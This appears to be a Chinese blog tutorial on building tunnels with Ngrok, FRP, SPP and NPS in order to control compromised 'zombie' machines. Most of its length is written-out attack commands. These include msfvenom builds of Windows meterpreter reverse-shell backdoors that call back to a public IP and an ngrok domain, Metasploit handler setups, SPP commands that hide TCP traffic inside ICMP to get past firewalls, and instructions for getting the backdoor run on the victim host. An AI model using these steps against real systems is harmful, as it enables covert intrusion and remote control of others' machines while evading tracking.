内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

旨在代理连接肉鸡后实现本地渗透肉鸡网络架构

Linux:Proxychains

Windows:Sockscap Proxifier

穿透项目:Ngrok Frp Spp Nps EW(停更)

优点:穿透加密数据,中间平台,防追踪,解决网络问题

https://www.ngrok.cc

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

http://www.rootkiter.com/EarthWorm

#内网穿透-Ngrok-入门-上线

https://www.ngrok.cc/

支持的协议:tcp、http、https

支持的类型:正向代理、反向代理

1、服务端配置:

开通隧道-TCP 协议-指向 IP 和端口-开通隧道-连接隧道

2、客户端(攻击者主机)连接服务端:

./sunny clientid 133328291918(隧道id) //控制端连接 Ngrok 的服务器

将下图的内容上传到攻击者主机,

3、客户端生成后门配置监听:

注意生成的是tcp协议后门,生成木马是使用的是ngrok平台提供的域名

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o ngrok.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost 0.0.0.0

set lport 2222

run

攻击者主机使用隧道号与平台建立连接,受害者主机点击后门之后,反向连接ngrok平台提供的域名,流量经过转发到攻击者主机上,实现内网穿透。

攻击者主机打开msf开启监听,监听端口是刚生成隧道的本地端口2222,然后服务器点击木马即可上线

#内网穿透-Frp-简易型-上线

https://github.com/fatedier/frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS

等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公

网。

自行搭建,方便修改,成本低,使用多样化,适合高富帅及隐私哥哥们

1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

服务器修改配置文件 frps.ini:

common

bind_port = 7000

启动服务端:

./frps -c ./frps.ini

看我这篇文章详细介绍使用

frp搭建隧道-CSDN博客

内网穿透-Spp-特殊协议-上线

https://github.com/esrrhs/spp

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代理

在对抗项目中有遇到过一些极端环境,比如目标封了tcp,http等常用出网的协议,

但是icmp,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。

在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

防火墙对tcp的出站封杀,然后我们这里利用spp这个项目把tcp封装成icmp出网,icmp协议到攻击机成功上线

1、服务端: 监听本地icmp流量

./spp -type server -proto ricmp -listen 0.0.0.0

2、客户端: 将本地8082端口流量转发至47.94.236.117 8081端口上(TCP封装成ICMP)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

3、CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

将后门上传至受害者主机执行

内网穿透-nps-特殊协议-上线

内网渗透---隧道搭建&SPP与NPS内网穿透_spp代理上线cs-CSDN博客

注意服务端与客户端版本一致

nps默认配置文件使用了80,443,8080,8024端口

80与443端口为域名解析模式默认端口

8080为web管理访问端口

8024为网桥端口,用于客户端与服务器通信 默认账号密码:admin/123

1、启动

./nps install

./nps

访问vps的8080端口,默认账号密码:admin/123

2、创建客户端,生成密匙

3、添加协议隧道,绑定指向

-客户端:

1、连接服务端:

bash 复制代码
./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v  #创建客户端后自动生成密钥

2、生成后门:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5566 -f exe -o nps.exe

3、监听后门:

攻击者监听自己电脑本地的6666端口

bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run
相关推荐
黑客老李7 小时前
web渗透实战 | js.map文件泄露导致的通杀漏洞
安全·web安全·小程序·黑客入门·渗透测试实战
财经三剑客8 小时前
AI元年,春节出行安全有了更好的答案
大数据·人工智能·安全
潆润千川科技10 小时前
中老年同城社交应用后端设计:如何平衡安全、性能与真实性?
安全·聊天小程序
市场部需要一个软件开发岗位10 小时前
JAVA开发常见安全问题:纵向越权
java·数据库·安全
飞凌嵌入式11 小时前
用「EN 18031认证」通关欧盟,这张 “网络安全护照” 已就位
网络·安全·能源
●VON11 小时前
CANN安全与隐私:从模型加固到数据合规的全栈防护实战
人工智能·安全
程序员清洒12 小时前
CANN模型安全:从对抗防御到隐私保护的全栈安全实战
人工智能·深度学习·安全
秋邱12 小时前
不仅是极速:从 CANN SHMEM 看 AIGC 集群通信的“安全微操”艺术
安全·aigc
初恋叫萱萱12 小时前
CANN 生态安全加固指南:构建可信、鲁棒、可审计的边缘 AI 系统
人工智能·安全
麦聪聊数据13 小时前
为何通用堡垒机无法在数据库运维中实现精准风控?
数据库·sql·安全·低代码·架构